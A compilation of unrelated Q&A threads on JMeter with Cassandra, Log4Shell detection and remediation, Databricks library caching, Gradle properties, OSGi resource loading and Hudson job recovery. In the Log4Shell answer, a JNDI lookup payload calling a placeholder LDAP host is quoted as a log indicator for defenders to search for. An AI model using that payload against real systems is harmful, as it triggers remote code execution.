I want to use JMeter to measure Cassandra response time to some queries and multiple simultaneous accesses.
I'm trying to follow the instructions on this page:
https://github.com/slowenthal/jmeter-cassandra
First, I unpack the archive in the JMeter install directory. However when I try to access the plugin Cassandra through JMeter I can not find it.
Does anyone know if I am follow the appropriate instructions? Or what can I do for everything work properly?
If you unpacked the archive into correct location it should be enough to restart JMeter
If you're trying to manually copy jars from cassandra release bundle - the best locations are:
for jmeter-cassandra-x.x.x.jar - JMeter's /lib/ext folder
for all other jars - JMeter's /lib folder
Third option is to set user.classpath property in user.properties file to point to the folder with the Cassandra jars. Again, JMeter restart will be required to pick the property value up.
And finally you can use Add directory or jar to classpath section of Test Plan
Latest JMeter 2.13 r1665067 seems to be working fine with jmeter-cassandra-0.9.2
Related
Recently there was a log4j vulnerability reported:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://www.randori.com/blog/cve-2021-44228/
https://www.lunasec.io/docs/blog/log4j-zero-day/
How do I know exactly my system has been attacked or exploited by injected arbitrary code?
Thank you so much
UPDATE: 2021-12-18...
Remember to always check for the latest information from the resources listed below
CVE-2021-45105... 2.16.0 and 2.12.2 are no longer valid remediations! The current fixing versions are 2.17.0 (Java 8) and 2.12.3 (Java 7). All other Java versions have to take the stop gap approach (removing/deleting JndiLookup.class file from the log4j-core JAR.
I have updated my message below accordingly.
Answering the question directly:
Reddit thread: log4j_0day_being_exploited has SEVERAL resources that can help you.
To detect vulnerability
cntl + f for Vendor Advisories. Check those lists to see if you are running any of that software. If you are and an update is available for it, update.
THEN cntl + f for .class and .jar recursive hunter. Run the program there, if it finds anything remediate.
You can also cntl + f for Vulnerability Detection if you want to perform a manual active test of your systems for the vulnerability
To detect exploit... this is more complex and all I do is is till you
cntl + f for Vendor Advisories... search through the stuff there... not sure which option will be best for you
More resources
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
This one has TONS of useful info including detectors, even more resource links, very easy to understand remediation steps, and more
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://logging.apache.org/log4j/2.x/security.html
Remediation:
CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105
While most people that need to know probably already know enough to do what they need to do, I thought I would still put this just in case...
Follow the guidance in those resources... it may change, but
As of 2021-12-18
It's basically
Remove log4j-core JAR files if possible
From both running machines for immediate fix AND
in your source code / source code management files to prevent future builds / releases / deployments from overwriting the change
If that is not possible (due to a dependency), upgrade them
If you are running Java8, then you can upgrade to log4j 2.17.0+
If you are running an earlier version of Java, then you can upgrade to log4j 2.12.3
If you are running an older version of Java, then you need to upgrade to the newest version of Java, and then use the newest version of Log4J
Again, these changes have to happen both on running machine and in code
If neither of those are possible for some reason... then there is the NON-remediation stop gap of removing the JndiLookup.class file from the log4j-core JARs.
There is a one-liner for the stop gap option on Linux using the zip command that comes packaged with most Linux distros by default.
zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
At time of writing, most of the guides online for the stop gap option on Windows say to do the following (again... assuming you can't do one of the remove JAR or upgrade options above):
Install something like 7-zip
Locate all of your log4j-core JAR files and for each one do the following...
Rename the JAR to change the extension to .zip
Use 7-zip to unzip the JAR (which now has a .zip extension)
Locate and remove the JndiLookup.class file from the unzipped folder
The path is \\path\\to\\unzippedFolder\\org\\apache\\logging\\log4j\\core\\lookup\\JndiLookup.class
Delete the old JAR file (which now has an extension of .zip)
Use 7-zip to RE-zip the folder
Rename the new .zip folder to change the extension to .jar
There are also some options to use Power Shell
Reddit thread: log4j_0day_being_exploited
ctrl+f for "PowerShell"
This is fine if you only have 1 or 2 JAR files to deal with and you don't mind installing 7-zip or you have PowerShell available to do it. However, if you have lots of JAR files, or if you don't want to install 7-zip and don't have access to Power Shell, I created an open-source VBS script that will do it for you without needing to install any additional software. https://github.com/CrazyKidJack/Windowslog4jClassRemover
Read the README and the Release Notes https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
You can check on your request log if you see something looking like this :
{jndi:ldap://example.com:1234/callback}
If you want to check if you can be attacked, you can run a POC from Github. This link seems to be the first POC released. You can now find others.
You can also find a black-box testing here.
On DataBricks on Azure:
I follow these steps:
create a library from a python egg, say simon_1_001.egg which contains a module simon.
attach the library to a cluster and restart the cluster
attach a notebook to the cluster and run:
import simon as s
print s.__file__
run the notebook and it correctly gives me a file name including the
string 'simon_1_001.egg'
then detach and delete the egg file, even emptying trash.
restart the cluster, detach and attach the notebook run it and
instead of complaining that it can't find module simon, it runs and
displays the same string
Similarly if I upload a newer version of the egg, say simon_1_002.egg, it still displays the same string.
If I wait half an hour clear and rerun a few times then eventually it will pick up the new library and will display simon_1_002.egg.
How can I properly clear down the old egg files ?
Simon, this is a bug in Databricks platform. When a library is created in Databricks using jar, the file is stored in dbfs:/FileStore and /databricks/python2/lib/python2.7/site-packages/ for Py2 and /databricks/python3/lib/python3.5/site-packages/ for Py3 clusters.
In both the jar and egg cases, the path is stored when a library is created. When a library is detached and removed from Trash, it is supposed to removed the copy from DBFS which it does not do currently.
To alliviate this inconsistency issue, you might want to check the environment subtab in Spark UI or using %sh ls in a cell for looking in appropriate paths to make sure if a library is removed correctly or not and also remove them using %sh rm command before restarting the cluster and attaching a newer version of the library.
There's another fun Databricks platform bug in job dependencies. Removing a dependent library in UI doesn't do anything, so old dependency versions are stuck there and jobs fail even if you delete the jar/egg from dbfs.
The only option seems to be updating the jobs using CLI or API. So you'll need to do something along these lines (CLI):
databricks jobs list
Find your job id, then:
databricks jobs get --job-id 5
Save the output to a json file job.json, remove stuff outside settings, copy stuff from settings to the root of the json document, remove the unwanted libraries, and then do:
databricks jobs reset --job-id 5 --json-file job.json
I'm working on 2 different machines (home vs. work) and transfer the code via GitHub, which works nice, but I just ran into a machine dependency when I added this code to the gradle.properties file to fix a vexing OAuth issue for google sheets:
org.gradle.java.home=C:\Program Files\Java\jdk1.8.0_131
org.gradle.java.home=C:\Program Files\Java\jdk1.8.0_77
Now I have to toggle between the 2 lines to get Gradle to compile. Need to check if I still need it (since I got the keystore files etc. sorted out), but I also wonder whether there is an easy solution to make this work (e.g. something like ifdef).
Obviously, I could just change the directory name in one of the machines I guess, but still curious how to solve this within Studio.
Lets start with a quote from the Gradle docs:
org.gradle.java.home
Specifies the Java home for the Gradle build process. The value can be set to either a jdk or jre location, however, depending on what your build does, jdk is safer. A reasonable default is used if the setting is unspecified.
So, by default, you should not need this project property (thats what they are called in Gradle).
However, there can be reasons, that you need to specify the Java directory. For this specific project property, you can follow Ray Tayeks advice and use the JAVA_HOME environment variable (on both systems). But there is also another approach, which can be used for any project property (and also for so-called system properties):
gradle.properties files can be located at different locations of the file system. Your files are located in the project directory and, therefor, they are included in your VCS. You can use them / it for project-related properties. An additional location is in the Gradle user home directory, which is by default the .gradle folder in your personal folder. This folder is not under version control, so simply define the property there.
try removing the line from the properties file. if that fails, try setting JAVA_HOME on each machine.
there are a lot of related questions.
you might try asking on the gradle forums.
Part 1: I've been trying to load a (XML) file as a resource from disk using bundle class loader. I can't package the file in a bundle beforehand as it'll be generated at runtime. I tried searching too, and almost always, people talk about loading resources from within a bundle (either same or different). So is it even possible to load a resource from disk in an OSGi environment using bundle classloader? If yes, how can it be done?
Part 2: Now I need to add a constraint to the above. In my complete scenario, while I'd be generating the file, it would be loaded by a third-party bundle. In this case, what could be done (generate in a certain location, any changes to classpath etc.) so that the third-party bundle's class loader could find the generated file?
Using: apache karaf 3.0.2, ubuntu 12.
Part 1:
So is it even possible to load a resource from disk in an OSGi environment using bundle classloader?
Resources (read-only files on the classpath) can be loaded with classloaders, not ordinary files from any folder of the disk. When you want to process the content of files from the ClassPath, you should use the classloader.
You want to generate a temporary file (generated and processed at runtime) so you should use the standard Java API for that:
File myTmpFile = File.createTempFile(...);
For more info, see the javadoc of this function: https://docs.oracle.com/javase/7/docs/api/java/io/File.html#createTempFile(java.lang.String,%20java.lang.String)
Part 2:
The third bundle should have an API that either accepts a File, URL, Path or other type instance that can point to a file in the file system.
Where and how are Hudson jobs and slave information stored?
I accidentally canceled a Hudson upgrade today. It wouldn't permit me to continue the upgrade; only to downgrade to the previous version and then upgrade again. After I downgraded, the two jobs I had created in the recent past were gone from the dashboard along with the slave node I created for one of those jobs, and the job I had recently deleted showed up in the dashboard. After the upgrade, the jobs and nodes are in that same state.
What happened? Can I restore my recent jobs and nodes, and how would I do that? Please keep in mind that while I know C/C++ well, web services are out of my area and I don't really know what a jar or a war is... I just followed online directions to install and set up Hudson and it worked. I wish to avoid simply re-creating those jobs; setting up one of them was less than trivial.
More info: Looking in the configuration, the home directory is incorrect; it thinks HOME is /root/ instead of /home/hudson. How did it change, and how do I change it back?
The previous version of Hudson is 1.379. It's currently running 1.381. I'm running it on RHEL 5.
When I look in the .hudson/jobs directory, both of the recent jobs are there, and the previously deleted job is not there. These job directories are missing their "workspace" directories.
As you've noticed, job configuration is stored in HUDSON_HOME/jobs/[name]/config.xml.
Slave configuration is stored in the main Hudson config file, HUDSON_HOME/config.xml.
I'm not sure why Hudson didn't pick up the jobs when you restarted after the upgrade. Checking the Hudson log might provide a clue, usually /var/log/hudson/hudson.log.
If your jobs' config.xml files are present, Hudson might be able to reread them if you reload your configuration (Manage Hudson -> Reload Configuration From Disk). If Hudson still doesn't recognize them (and the config file is present), your best bet is probably to recreate the jobs manually grabbing whatever you can from the config file (keeping in mind that XML escapes are applied to text fields like the build commands).
I got a helpful clue when I revisited the "manage hudson" page and saw a message that I had data in an old and unreadable format. That suggested Hudson was running a .war that was different from the one used more recently. So I searched the disk for any "hudson.war" files and found two; one from a couple of weeks ago and one from some months ago. The newer one is in the place I expected to find one, and the older one was elsewhere. I renamed the older one. Also, I have a start-hudson.sh script, added 'export HUDSON_HOME=/home/hudson' to that script, and used it to restart hudson. Lo and behold, my new jobs were back and working.
I would have thought that simply naming the HUDSON_HOME variable would have done it, but I did that first and restarted Hudson, and no joy. It was only after I renamed the older .war AND had set the environment variable that I found the fix. My guess would be that the older .war file had root set as HUDSON_HOME and that somehow that .war was being run, but the version showed on the page was the current version. I don't understand it, but I'm happy to be back in business.